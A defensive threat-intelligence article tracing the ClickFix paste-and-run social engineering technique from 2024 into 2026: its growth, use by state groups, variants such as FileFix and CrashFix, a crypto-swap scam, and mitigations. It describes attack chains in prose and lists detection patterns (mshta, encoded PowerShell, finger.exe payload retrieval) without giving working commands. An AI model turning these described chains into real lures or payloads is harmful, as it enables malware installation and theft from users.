How a social engineering technique surged 517% in 2025, became the number one initial access method observed by Microsoft Defender Experts, recruited nation-state hackers across three countries, spawned commercial builders and browser-crashing variants, and is now hijacking cryptocurrency swaps through Pastebin comments.
Somewhere right now, a person is staring at a fake error message on their screen. The prompt looks familiar—maybe a CAPTCHA, maybe a browser update notification, maybe a troubleshooting dialog from what appears to be Microsoft or Google. It tells them there is a problem, and it offers a fix. All they have to do is copy a command, paste it into their system terminal, and press Enter.
When they do, the malware installs itself. No drive-by download. No malicious attachment. No exploit kit. The victim did it with their own hands.
This is ClickFix, and it has become one of the defining cybersecurity threats of the past two years. What started as a niche trick deployed by a single initial access broker in early 2024 has erupted into a global phenomenon, adopted by criminal gangs and intelligence services alike, targeting individuals, enterprises, and government agencies across every major operating system. By the end of 2024, the technique had begun its surge; Microsoft's October 2025 Digital Defense Report identified it as the number one initial access method in its Defender Experts data, accounting for 47% of all incidents. By the first half of 2025, ESET had measured a 517% surge in six months. And in early 2026, the technique continues to evolve in ways that make it harder to detect and easier to deploy than at any point in its history.
In its latest iteration, ClickFix is being weaponized through Pastebin comments to hijack cryptocurrency transactions in real time—while a separate variant deliberately crashes victims' browsers to manufacture the very problem it claims to fix.
The Anatomy of a Self-Inflicted Compromise
ClickFix works by exploiting something no firewall or antivirus can fully protect against: human behavior.
The technique was first documented in March 2024 by researchers at Proofpoint, who identified it in campaigns run by the initial access broker tracked as TA571 and the ClearFake malware distribution cluster. Proofpoint's researchers coined the name “ClickFix” because the malicious prompts almost always included a button labeled “Fix,” “How to fix,” or “Fix it.”
If you have read other sources on this topic, you have likely encountered the same underlying technique under several different names: ClickFix, paste-and-run, ClearFake, FakeCAPTCHA, and occasionally fakeCAPTCHA (lowercase). This is not a case of competing descriptions of different attacks—they largely describe the same category of behavior. Here is how to untangle them. ClickFix is the name Proofpoint coined to describe the social engineering technique itself, specifically where a fake error or verification prompt tricks a user into manually executing a pasted command. It is the dominant term in industry reporting and the one used throughout this article. ClearFake is the name for a specific activity cluster—a group of threat actors who compromise legitimate websites and inject malicious scripts to deliver payloads. ClearFake uses ClickFix as its delivery mechanism; it is not a synonym for the technique. GoDaddy researchers note ClearFake was observed as early as August 2023, and some sources apply that earlier date to the broader technique. This article uses March 2024 as the documented starting point for the ClickFix technique specifically because that is when Proofpoint first identified and named the clipboard-paste-execute social engineering pattern as distinct from older fake-browser-update campaigns. Paste-and-run is the preferred term used by Red Canary’s threat intelligence team, who argue it is more accurate because not all lures involve a “fix”—some involve fake CAPTCHA checks, meeting errors, or document rendering problems where the word “fix” never appears. They have a point, and MITRE ATT&CK’s formal designation is Malicious Copy and Paste (T1204.004). This article uses “ClickFix” because it is the most widely recognized term in current threat reporting, appears in the highest volume of primary sources, and is the name most readers will encounter in vendor advisories and news coverage. All of these names describe the same threat.
Some researchers note the technique may have appeared in limited form as early as October 2023, but its widespread proliferation began in early 2024 following TA571's deployment.
That naming choice was more than descriptive—it pointed to the psychological core of the attack. The technique exploits a deeply conditioned behavior: when users encounter what appears to be a system error with a ready-made solution, many follow the instructions without questioning the source. Years of interacting with automated repair prompts, troubleshooters, and one-click fixes across operating systems have trained users to trust these interactions. Attackers recognized this pattern and weaponized it.
The basic attack unfolds in three steps. First, the victim lands on a webpage—via a compromised legitimate site, a phishing link, malvertising, or SEO poisoning—displaying what appears to be a CAPTCHA verification, a browser error, or a document rendering problem. Second, the page silently copies a malicious command—typically a PowerShell script or shell command—to the victim's clipboard using JavaScript's navigator.clipboard.writeText() API. Third, the victim is instructed to open a system dialog (the Windows Run box via Win+R, Terminal on macOS, or in some variants the browser console) and paste the command.
navigator.clipboard.writeText() — a malicious PowerShell or shell command is placed on the clipboard without any visible indication.
Attackers have cloned real interfaces to increase believability: Cloudflare Turnstile, Google reCAPTCHA, Microsoft authentication pages, and Okta login portals have all been replicated in documented ClickFix campaigns. Recorded Future's Insikt Group, in a March 2026 analysis of five distinct ClickFix clusters observed since at least May 2024, found that more sophisticated clusters now perform operating system detection at the landing page level, serving tailored commands for Windows or macOS depending on the victim's environment.
In MITRE ATT&CK terms, the attack maps primarily to T1204.004 (User Execution: Malicious Copy/Paste)—a sub-technique added specifically to capture this pattern—combined with T1059.001 (Command and Scripting Interpreter: PowerShell) and T1189 (Drive-by Compromise) for initial delivery.
The result is that the victim bypasses their own security protections. Endpoint detection tools, browser sandboxes, and email filters are designed to stop automated malware delivery. ClickFix sidesteps all of them by having the user execute the malicious payload manually. Email security scans attachments and URLs, but ClickFix campaigns frequently contain only a clean URL that redirects through a traffic distribution system (TDS) before landing on the attack page. Browser protections like Google Safe Browsing do not trigger because the browser is not downloading an executable—the user is. The browser sees a legitimate clipboard copy event. The EDR sees the user opening PowerShell. Neither triggers an alert in isolation because the actions are indistinguishable from normal user behavior.
An Explosion in Scale
The numbers describe a threat that has moved from emerging to dominant in under two years.
ESET's H1 2025 Threat Report, published June 26, 2025, found that ClickFix detections surged 517% compared to H2 2024. The technique accounted for nearly 8% of all blocked attacks during the period, making it the second most common attack vector behind only traditional phishing. Jiří Kropáč, Director of Threat Prevention Labs at ESET, said in a statement accompanying the report: “The list of threats that ClickFix attacks lead to is growing by the day, including infostealers, ransomware, remote access trojans, cryptominers, post-exploitation tools, and even custom malware from nation-state-aligned threat actors.”
Microsoft's 2025 Digital Defense Report, published in October 2025, placed ClickFix at the top of the initial access hierarchy. The report identified it as the number one initial access method observed by Microsoft Defender Experts, accounting for 47% of all incidents tracked—surpassing traditional phishing, which accounted for 35%. The report specifically noted that the rapid surge began in November 2024 and has not slowed. Nearly half of all initial compromises that Microsoft tracked in its Defender Experts data in the preceding year came down to users pasting commands into their own systems.
You may notice that ESET's H1 2025 data ranks ClickFix as the second most common attack vector (behind phishing), while Microsoft's 2025 Digital Defense Report ranks it first at 47% of incidents. Both figures are accurate within their own scope, and the difference is methodological rather than contradictory. ESET's data measures ClickFix as a share of all blocked threats across its entire telemetry base—a broader population that includes a large volume of commodity phishing that traditional filters still catch at high rates. Microsoft's 47% figure comes specifically from Microsoft Defender Experts incident data—a subset of higher-severity, actively investigated initial access events rather than all blocked threats. In the population of incidents that actually result in human-investigated compromise, where commodity phishing has largely been filtered out, ClickFix has become the dominant vector. Both numbers are credible. The ESET figure better represents the broad threat landscape; the Microsoft figure better represents the risk of actual successful compromise reaching a human analyst. This article cites both because they illuminate different things. The short version: by the time phishing filters have done their work, ClickFix is what is left.
The Center for Internet Security (CIS) published corroborating data in an October 2025 advisory. The CIS Cyber Threat Intelligence team, tracking ClickFix campaigns between January and October 2025 across U.S. state, local, tribal, and territorial (SLTT) government networks, found that ClickFix comprised over a third of all non-malware alerts generated by Albert—CIS's intrusion detection system deployed across those networks—in the first half of 2025. The CIS team documented campaigns that led directly to ransomware deployment, including an August 2025 Interlock ransomware incident impacting an SLTT government victim. Separately, ReliaQuest reported in June 2025 that ClickFix drove a 10% increase in detected drive-by compromises during the March through May 2025 period.
What makes this growth especially alarming is the industrialization of the technique. ESET's report found that threat actors are selling ClickFix builders on criminal markets, giving low-skilled attackers weaponized landing pages ready for deployment. This commoditization has since deepened: a cybercrime tool called ErrTraffic, identified by Hudson Rock researchers on Russian-language forums in December 2025, allows threat actors to automate ClickFix attacks by generating fake visual glitches on compromised websites. Sold for a one-time purchase of $800, ErrTraffic includes OS fingerprinting, geolocation targeting, and multi-platform payload delivery across Windows, macOS, Android, and Linux. Dashboard data from active campaigns showed conversion rates approaching 60%.
Recorded Future's Insikt Group, in its March 2026 cluster analysis, noted a consistent architectural pattern across all five tracked clusters: each relies on a living-off-the-land approach, routing execution through native system utilities already present on the operating system. Once execution completes, the final payload typically runs entirely in memory, leaving almost no forensic evidence on disk. On Windows, persistence is established by placing a shortcut in the Startup folder. The technique is optimized not just for delivery but for evasion after delivery.
From Cybercrime to Espionage
Perhaps the clearest signal that ClickFix has moved from a fringe technique to an established weapon is its adoption by nation-state actors.
In an April 2025 report titled “Around the World in 90 Days,” Proofpoint documented how at least four state-sponsored groups incorporated ClickFix into their espionage campaigns between October 2024 and January 2025. The groups spanned three countries: North Korea's Kimsuky (tracked as TA427), Iran's MuddyWater (tracked as TA450), and two Russian groups—APT28 (TA422) and a cluster tracked as UNK_RemoteRogue.
Each group adapted ClickFix to its existing tradecraft. Proofpoint first observed Kimsuky using ClickFix in January and February 2025, targeting individuals in fewer than five organizations in the think tank sector. In one documented case, TA427 operators masqueraded as a Japanese diplomat and sent emails to a target asking to arrange a meeting with Ambassador Shigeo Yamada, the Japanese ambassador to the United States. After building trust through legitimate-seeming communications—including a benign attachment with a PDF titled “Letter from Ambassador Cho Hyun-Dong.pdf”—the attackers directed the target to an attacker-controlled site impersonating a secure document-sharing platform. The ClickFix lure on that page initiated a multi-stage chain executing PowerShell, VBS, and batch scripts that ultimately delivered Quasar RAT, a commodity remote access trojan.
MuddyWater took a different approach, sending phishing emails from the attacker-controlled address support@microsoftonlines.com to targets in at least 39 organizations across the Middle East. The emails masqueraded as urgent Microsoft security updates, instructing recipients to execute commands that would supposedly patch a critical vulnerability. Rather than delivering traditional malware, MuddyWater used ClickFix to install legitimate remote monitoring and management (RMM) software—specifically, Level—for persistent access, an approach designed to blend in with authorized software.
Proofpoint noted in its analysis that the incorporation of ClickFix was not revolutionizing these groups' campaigns but rather replacing the installation and execution stages in existing infection chains with a method that leveraged human interaction to bypass security measures. Some groups experimented with the technique in limited campaigns before returning to standard tactics—suggesting ongoing evaluation of its operational value rather than full commitment.
Some coverage of ClickFix's nation-state involvement has described the development as nation-states “adopting” or “weaponizing” the technique, framing it as a permanent shift in state tradecraft. Proofpoint's own language is more precise: these groups are experimenting with ClickFix, and Proofpoint itself noted that some returned to their standard tactics shortly after initial trials. This is a meaningful distinction. Nation-state groups continually evaluate new techniques in limited test campaigns; using ClickFix once does not mean it has become a core tool. At the same time, the fact that groups from three separate countries tested it within the same three-month window, and that North Korean actors have continued deploying it in cryptocurrency-targeting campaigns well into 2026, suggests the experiment has shown enough promise to persist. This article characterizes the activity as adoption by some groups and experimentation by others, because that is what the sourced reporting actually shows. Readers should treat sweeping claims that nation-states have “fully adopted” ClickFix with scrutiny; the evidence supports ongoing and expanding use, not necessarily wholesale integration across all operations.
Since Proofpoint's April 2025 report, nation-state adoption has expanded further. In February and March 2025, Sekoia documented Lazarus Group—a North Korean threat actor tracked separately from Kimsuky—launching “ClickFake Interview” campaigns that used ClickFix tactics to target non-technical employees at centralized finance companies, impersonating major cryptocurrency firms including Coinbase, Kraken, and Bybit. In February 2026, Google Mandiant researchers documented UNC1069, a North Korean threat group, using a spoofed Zoom meeting in a ClickFix campaign that deployed seven distinct macOS malware families against a cryptocurrency executive. The victim was initially contacted via Telegram from a compromised account belonging to a crypto company executive, then directed to a spoofed Zoom page where fake audio troubleshooting steps initiated the infection chain.
Microsoft's security team published a comprehensive August 2025 analysis documenting a campaign cluster targeting organizations in government, finance, transportation, and education across Portugal, Switzerland, Luxembourg, France, Hungary, and Mexico. The campaign—which Microsoft first identified in May 2025 targeting Portuguese organizations, then tracked expanding internationally—delivered Lampion malware, an infostealer focused on banking credentials, and remained active as of the publication date. The delivery mechanism used phishing emails containing a ZIP file; once opened, an HTML file redirected targets to a fake Portuguese tax authority site where the ClickFix lure was hosted.
Microsoft also documented a March 2025 campaign by a cluster tracked as Storm-0426 that used phishing emails with payment and invoice lures, routing victims through the Prometheus traffic distribution system across numerous compromised sites before landing on ClickFix pages that deployed MintsLoader. A June 2025 campaign impersonating the U.S. Social Security Administration, beginning with emails sent from a legitimate but compromised Brazilian domain, used ClickFix to deliver ScreenConnect—a legitimate remote management tool that once installed provides an attacker full remote control of the victim's system.
The Pastebin Crypto Swap Attack
While ClickFix has been deployed through dozens of lures—fake CAPTCHAs, browser errors, meeting invitations, Windows update screens—one of its more recent and technically distinct variants targets cryptocurrency users through Pastebin comments.
As reported by BleepingComputer in February 2026, threat actors are distributing ClickFix-style attacks through Pastebin, tricking cryptocurrency users into executing malicious JavaScript in their browser that hijacks Bitcoin swap transactions and redirects funds to attacker-controlled wallets. The campaign uses social engineering that promises large profits from a supposed arbitrage exploit on the Swapzone.io cryptocurrency exchange aggregator.
A detailed technical analysis published by BeyondMachines examined the mechanics. Posts advertised as a “Crypto Exchange profit method” link to a Google Drive document presented as an “exploit guide.” The document provides a fabricated technical explanation of a supposed backend vulnerability in the systems of real exchange ChangeNOW, promising approximately 37% profit during cryptocurrency conversion. The instructions describe a “simple program” that users need to run.
The instructions direct victims to navigate to Swapzone.io, then manually type javascript: in their browser's address bar—browsers block pasting this prefix as a security measure, so the victim must type it manually—and then paste a script provided by the attackers. What actually executes is far from the promised arbitrage tool. The script contains a URL with a base64-encoded payload hidden in the path structure. It extracts this encoded string, decodes it, fetches the actual malicious code from a remote server, and executes it.
The decoded payload contains multiple attack vectors working simultaneously. Functions modify the displayed exchange rates and amounts on the Swapzone interface to show the fake 37% profit increase. Meanwhile, clipboard hijacking silently replaces any copied wallet addresses with attacker-controlled addresses. The victim sees inflated exchange rates, believes the exploit is working, and initiates a swap—sending their cryptocurrency directly to the attacker.
The social engineering is particularly effective because it exploits greed rather than fear. Unlike typical ClickFix lures that create urgency around a fake technical problem, this variant appeals to the victim's desire to profit from someone else's vulnerability. The BeyondMachines analysis pointed out that the premise collapses under scrutiny: a 37% rate discrepancy would be detected within minutes by professional arbitrage traders, the technical explanation involving “Node v1.9” is architecturally nonsensical, and anyone who actually discovered such a flaw would exploit it privately rather than sharing it with strangers on Pastebin.
This crypto-targeting variant is operating within a broader context of industrial-scale cryptocurrency fraud. According to Chainalysis's 2026 Crypto Crime Report, an estimated $14 billion in cryptocurrency was received by scam-linked addresses on-chain in 2025, with projections the total could exceed $17 billion as additional illicit wallets are identified—consistent with historical reporting patterns where estimates increase by an average of 24% between reporting periods. Impersonation scams posted 1,400% year-over-year growth, and AI-enabled scams were found to be 4.5 times more profitable than traditional scams. The average scam payment increased from $782 in 2024 to $2,764 in 2025.
The Expanding Attack Surface
ClickFix has not remained confined to Windows. ESET's H1 2025 report explicitly noted that the technique affects all major operating systems, including Windows, Linux, and macOS. While Windows remains the primary target, the cross-platform expansion represents a significant escalation in the threat's reach.
Campaigns targeting macOS users gained particular momentum in 2025. Sekoia documented macOS-targeting ClickFix campaigns as early as late 2024 through fake Google Meet pages distributing infostealers. By mid-2025, the campaigns had grown more technically refined. CloudSEK identified a campaign impersonating Spectrum, a U.S. telecommunications provider, that used ClickFix to deliver the Atomic macOS Stealer (AMOS) infostealer through typosquatted domains. Microsoft's August 2025 analysis noted that some delivery pages contained implementation errors—including displaying Windows-specific instructions to macOS users—suggesting hastily assembled infrastructure deployed at volume.
Recorded Future's Insikt Group identified a fifth activity cluster, observed in early 2026, that specifically served macOS victims with tailored execution chains. One page impersonating Apple's support site instructed users to run a command ostensibly to free up storage space. That command used stacked encoding—first decoding hex to Base64, then piping the result through the zsh shell—to silently fetch and execute MacSync, an information stealer. On macOS, ClickFix payloads running entirely in memory have been observed to establish persistence via Launch Agents or Login Items rather than the Windows Startup folder, but the underlying social engineering is identical across platforms.
In February 2026, BleepingComputer reported that threat actors were abusing Claude AI artifacts and Google Ads in ClickFix campaigns delivering infostealer malware to macOS users. Moonlock Lab and AdGuard researchers found that over 10,000 users had accessed the malicious content, which was hosted on the claude.ai domain. The campaign demonstrated that attackers are willing to leverage any trusted platform—including AI tools—to lend credibility to malicious instructions.
Linux targeting, while less extensively documented in public reporting, represents an underappreciated risk. Enterprise servers, developer workstations, and cloud environments running Linux can be targeted through ClickFix lures that instruct users to paste commands into terminal emulators. ErrTraffic explicitly includes Linux payload delivery, and the same social engineering principles that work against Windows and macOS users apply equally to Linux administrators accustomed to executing commands in the shell.
Variants: FileFix, CrashFix, and Beyond
The core ClickFix technique has spawned a family of variants, each exploiting a different execution path while maintaining the same social engineering premise.
| Variant | Execution path | Lure type | Notable payload | First documented |
|---|---|---|---|---|
| ClickFix | Windows Run dialog (Win+R) or Terminal | Fake CAPTCHA, browser error, document fix | Lumma Stealer, AsyncRAT, NetSupport RAT, Quasar RAT | Mar 2024 |
| FileFix | Windows File Explorer address bar | Fake file path — PowerShell command first, benign-looking path hidden after # as decoy |
Various infostealers; in-wild within 2 weeks of disclosure | Jun 2025 |
| CrashFix | Windows Run dialog (Win+R) after real browser crash | NexShield extension deliberately OOM-crashes browser; fake recovery prompt | ModeloRAT (Python RAT, domain-joined hosts only) | Jan 2026 |
| ConsentFix | Azure CLI OAuth consent flow | Fake Microsoft account verification | Microsoft account takeover — no password or MFA bypass needed | 2025 |
| TerminalFix | Native shell (macOS Terminal / Linux bash) | System error requiring "manual terminal fix" | macOS infostealers, cross-platform payloads | 2025 |
| DownloadFix | File download and manual execution | Fake installer or patch lure | Various; depends on campaign | 2025 |
In June 2025, security researcher mr.d0x introduced FileFix, a variant that shifts the attack vector from the Windows Run dialog to the Windows File Explorer address bar. A malicious webpage opens a legitimate Explorer window via the HTML <input type="file"> element while silently copying a disguised PowerShell command to the victim's clipboard. The victim is instructed to paste what appears to be a file path into the Explorer address bar. The clipboard content actually contains the malicious command first, followed by a comment character (#) and a convincing-looking file path as a decoy — so only the innocent-looking path is visible in the address bar, but the PowerShell command before it executes. Check Point Research observed threat actors actively testing FileFix in real-world campaigns within two weeks of its public disclosure, identifying a phishing domain registered July 6, 2025 that deployed FileFix scripts.
In January 2026, a more sophisticated variant emerged. Huntress researchers identified a campaign by the threat actor tracked as KongTuke—also known as 404 TDS, Chaya_002, LandUpdate808, and TAG-124—using a malicious Chrome extension called NexShield to deliver what Huntress named CrashFix. NexShield masqueraded as the legitimate uBlock Origin Lite ad blocker, impersonating the developer Raymond Hill, and was distributed via Google Ads targeting users searching for ad blockers. It had accumulated at least 5,000 downloads before being removed from the Chrome Web Store.
Unlike typical ClickFix variants that fake a problem, CrashFix creates a real one. NexShield includes a 60-minute delayed payload execution to avoid linking the extension to subsequent behavior. When it activates, the extension floods the browser with chrome.runtime port connections in an infinite loop, exhausting memory resources and causing Chrome or Edge to hang and crash. When the victim force-closes and restarts the browser, the extension displays a fake security warning claiming the browser “stopped abnormally” and recommends running a scan. That recommendation leads to the familiar ClickFix sequence: open the Windows Run dialog (Win+R), paste the clipboard contents, press Enter.
“By impersonating a trusted open-source project, crashing the user’s browser on purpose, and then offering a fake fix, they have built a self-sustaining infection loop that preys on user frustration.”
— Huntress researchers Anna Pham, Tanner Filip, and Dani Lopez, January 2026
Microsoft confirmed CrashFix as a notable escalation in ClickFix tradecraft in a February 5, 2026 analysis, describing it as combining “user disruption with social engineering to increase execution success while reducing reliance on traditional exploit techniques.” Microsoft also documented a specific LOLBin abuse within the CrashFix chain: the native Windows utility finger.exe—originally designed to retrieve user information from remote systems—is copied to the temporary directory, renamed to ct.exe, and used to retrieve an obfuscated PowerShell payload from an attacker-controlled IP address. This renaming is intended to obscure the utility's identity during analysis.
For domain-joined hosts in corporate environments, the CrashFix chain culminates in ModeloRAT, a previously undocumented Python-based RAT that uses RC4 encryption for command-and-control communications, establishes persistence via the Registry, and supports execution of binaries, DLLs, Python scripts, and PowerShell commands. KongTuke deliberately targets corporate environments: domain-joined machines receive the full ModeloRAT payload, while home user machines received a “TEST PAYLOAD!!!!” response from the C2 during Huntress's analysis, suggesting the non-enterprise attack chain remained under development. KongTuke's infrastructure has previously been linked to Rhysida ransomware and Interlock ransomware operations.
Other documented variants include ConsentFix, reported by BleepingComputer, which abuses the Azure CLI OAuth app to hijack Microsoft accounts without requiring a password or bypassing multi-factor authentication—representing an escalation beyond credential theft toward direct account takeover through OAuth consent phishing. A variant called TerminalFix convinces users to manually open native shell applications, while DownloadFix tricks users into downloading and executing malicious files through social pretexts. Each variant exploits the same core vulnerability: user trust in routine system interactions.
Defense Strategies
Defending against ClickFix requires a layered approach that addresses both the technical and human dimensions of the attack.
On the technical side, the CIS advisory provides a strong starting point: restrict PowerShell execution for standard users by setting ExecutionPolicy to AllSigned or Restricted via Group Policy, ensuring only signed scripts can execute. Use AppLocker or Software Restriction Policies to prevent PowerShell from launching for non-administrative users entirely. Enforce UAC credential prompting so that launching PowerShell requires full administrative credentials. For organizations using Windows Defender Application Control (WDAC), deploy code integrity policies that block PowerShell when launched from suspicious parent processes.
There is a widely circulated and legitimate point of contention around recommending ExecutionPolicy as a ClickFix defense. Microsoft's own documentation states explicitly: “The execution policy isn't a security system that restricts user actions. For example, users can easily bypass a policy by typing the script contents at the command line when they cannot run a script.” A user or attacker can trivially circumvent ExecutionPolicy by passing -ExecutionPolicy Bypass as a command-line flag, which is why ClickFix payloads frequently do exactly that. So why does the CIS advisory still recommend it, and why is it included here? Because in most enterprise environments, standard users do not have the knowledge or permissions to override a Group Policy-enforced ExecutionPolicy, and the recommendation is paired with Group Policy enforcement at the MachinePolicy scope—not a local user-level setting. A user-level or local machine ExecutionPolicy is trivially bypassable. A MachinePolicy-enforced Group Policy setting is meaningfully harder to circumvent without administrative access. The recommendation is also defensive-in-depth: it is not presented as a standalone solution but as one layer in a stack that also includes AppLocker, WDAC, and UAC hardening. Readers who see this recommendation elsewhere without those caveats are right to question it. With Group Policy enforcement and the full defensive stack, it remains a useful layer. On its own, it is not sufficient.
Beyond PowerShell hardening, block execution of commonly abused Living-off-the-Land Binaries (LOLBins) from user directories. mshta.exe—which executes HTML Applications (.hta files)—is a core component of ClickFix and FileFix delivery chains; blocking or removing it eliminates one of the more dangerous execution paths. Microsoft specifically recommended restricting outbound access for the finger utility (TCP port 79) following the CrashFix campaign, in which finger.exe was abused to retrieve attacker payloads. Restricting the installation of browser extensions to approved lists can prevent CrashFix-style attacks delivered through malicious browser extensions.
For SIEM platforms, detection engineers including Florian Roth of Nextron Systems have published Sigma rules specifically targeting ClickFix behavior patterns: explorer.exe spawning mshta.exe, PowerShell processes initiated from unusual parent processes, and Base64-encoded commands passed to powershell.exe via the Run dialog. Enable PowerShell logging at three levels—Transcript, Module, and Script Block logging—to ensure visibility into what actually executes when a user pastes a command. Monitor for clipboard-to-terminal patterns: sequences of Win+R followed by PowerShell or cmd execution within short timeframes are anomalous for most business users. Monitor DNS for nslookup commands executed from user-initiated processes targeting external DNS servers, as documented DNS-based ClickFix variants use DNS as a staging channel.
Darktrace, in a June 2025 case study, demonstrated how anomaly-based detection could identify ClickFix activity after initial access by detecting unusual PowerShell user agents, unexpected external communications, and data exfiltration patterns—even when the initial compromise occurred outside the organization's direct visibility.
ExecutionPolicy to AllSigned or Restricted via Group Policy at MachinePolicy scopemshta.exe execution from user directories — core ClickFix and FileFix delivery componentfinger.exe (TCP port 79) — abused in CrashFix for payload retrievalfinger.exe → ct.exe in %TEMP%)explorer.exe spawning mshta.exe, Base64 args to powershell.exenslookup from user-initiated processes to external DNS — DNS staging channel indicatorTechnical controls alone are insufficient. The defining challenge of ClickFix is that the victim is an active participant in their own compromise. The browser sees a legitimate clipboard event. The EDR sees the user opening PowerShell. Neither triggers an alert in isolation. This makes user awareness training more critical than ever, with a specific emphasis that legitimate websites, software updates, and verification processes will never require users to open a system terminal and paste commands they do not understand.
The CrashFix variant adds an important dimension to user training: attackers are now willing to create real technical problems to make their fake fixes more convincing. A browser that has genuinely crashed is more persuasive than a fake error message. Users and security teams should treat any prompt to run a command—even one that appears in response to a real system problem—with the same skepticism applied to phishing lures.
If a webpage, browser extension notification, or any on-screen prompt asks you to open Run, Terminal, or a browser console and paste a command, close it and report it. This principle should be reinforced in security awareness training with the same emphasis given to phishing link identification. Microsoft specifically recommends training users that pasting commands or launching remote tools on request is as risky as clicking suspicious links.
For cryptocurrency users specifically, the Pastebin crypto swap variant carries a clear lesson: if someone is sharing an exploit that supposedly generates free money, the scam is you. No legitimate vulnerability would be broadcast on Pastebin. Arbitrage discrepancies of 37% do not exist undetected. And manually typing javascript: into your browser's address bar to run untrusted code is handing your wallet to a stranger.
What Comes Next
ClickFix represents a fundamental shift in attacker methodology. Rather than fighting endpoint security tools head-on, attackers have found it more efficient to recruit users as unwitting accomplices. The technique's growth trajectory—from a niche tactic in early 2024 to the top initial access method by late 2024, by Microsoft's own telemetry—its adoption by nation-state groups across three countries within a single quarter, the emergence of commercial builders and automation tools like ErrTraffic, and the proliferation of variants from FileFix to CrashFix all indicate a threat still in its expansion phase.
Recorded Future's Insikt Group, in its March 2026 assessment, predicts that future ClickFix iterations will incorporate more granular browser fingerprinting to conditionally serve payloads based on a victim's hardware profile, geographic location, or organizational membership. Infrastructure will continue to be built and dismantled quickly, staying ahead of blocklists. The social engineering component will continue to evolve, seeking new pretexts—tax season, travel bookings, AI tools, browser security alerts—that exploit context-specific trust. The Recorded Future analysis assessed with high confidence that ClickFix will remain a heavily used initial access vector throughout 2026.
The proliferation of ClickFix also reflects a broader trend visible in the Chainalysis data: cybercrime and fraud have both shifted away from purely technical exploits toward deception sophisticated enough to bypass human skepticism. Scams now rely on something harder to patch than a vulnerable smart contract or a misconfigured server: human trust in familiar interfaces.
As long as people can be convinced to paste a command they do not understand into a prompt they should not have opened, ClickFix and its descendants will continue to find victims. The defense starts with a single principle that needs to become as automatic as looking both ways before crossing the road: no legitimate service, update, verification system, or troubleshooter will ever ask you to fix a problem by running a command you copied from a webpage. If it does, the only thing that needs fixing is your browser tab—close it.
Proofpoint, “Around the World in 90 Days: State-Sponsored Actors Try ClickFix” (April 17, 2025); Proofpoint, “From Clipboard to Compromise: A PowerShell Self-Pwn” (2024); ESET H1 2025 Threat Report (June 26, 2025); Infosecurity Magazine, “ClickFix Attacks Surge 517% in 2025” (June 26, 2025); Microsoft Security Blog, “Think Before You Click(Fix): Analyzing the ClickFix Social Engineering Technique” (August 21, 2025); Microsoft Security Blog, “New ClickFix Variant CrashFix Deploying Python Remote Access Trojan” (February 5, 2026); Microsoft Digital Defense Report 2025 (October 2025); Center for Internet Security, “ClickFix: An Adaptive Social Engineering Technique” (October 2025); BleepingComputer, “Pastebin comments push ClickFix JavaScript attack to hijack crypto swaps” (February 2026); BleepingComputer, “Fake ad blocker extension crashes the browser for ClickFix attacks” (January 19, 2026); BeyondMachines, “Cryptocurrency theft through a program that victims need to run” (2025); Chainalysis, 2026 Crypto Crime Report (January 2026); Check Point Research, “FileFix: The New Social Engineering Attack Building on ClickFix Tested in the Wild” (July 2025); Darktrace, “Unpacking ClickFix: Detection Insights” (June 2025); Sekoia, “ClickFix Tactic: The Phantom Meet” (October 2024); Sekoia, “From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic” (March 2025); BleepingComputer, “Claude LLM artifacts abused to push Mac infostealers in ClickFix attack” (February 2026); CloudSEK, “AMOS Variant Distributed Via ClickFix in Spectrum-Themed Dynamic Delivery Campaign” (August 2025); Google Mandiant, “UNC1069 macOS Malware Campaign” (February 2026); Huntress, “Dissecting CrashFix: KongTuke’s New Toy” (January 2026); BleepingComputer, “ConsentFix variant abuses Azure CLI OAuth” (2025); Hudson Rock, “The Industrialization of ClickFix: Inside ErrTraffic” (December 2025); CISA/FBI/HHS/MS-ISAC, “#StopRansomware: Interlock” AA25-203A (July 2025); ReliaQuest, drive-by compromise analysis (June 2025); Recorded Future Insikt Group, “ClickFix Campaigns Targeting Windows and macOS” (March 2026); The Hacker News, “CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures” (February 6, 2026)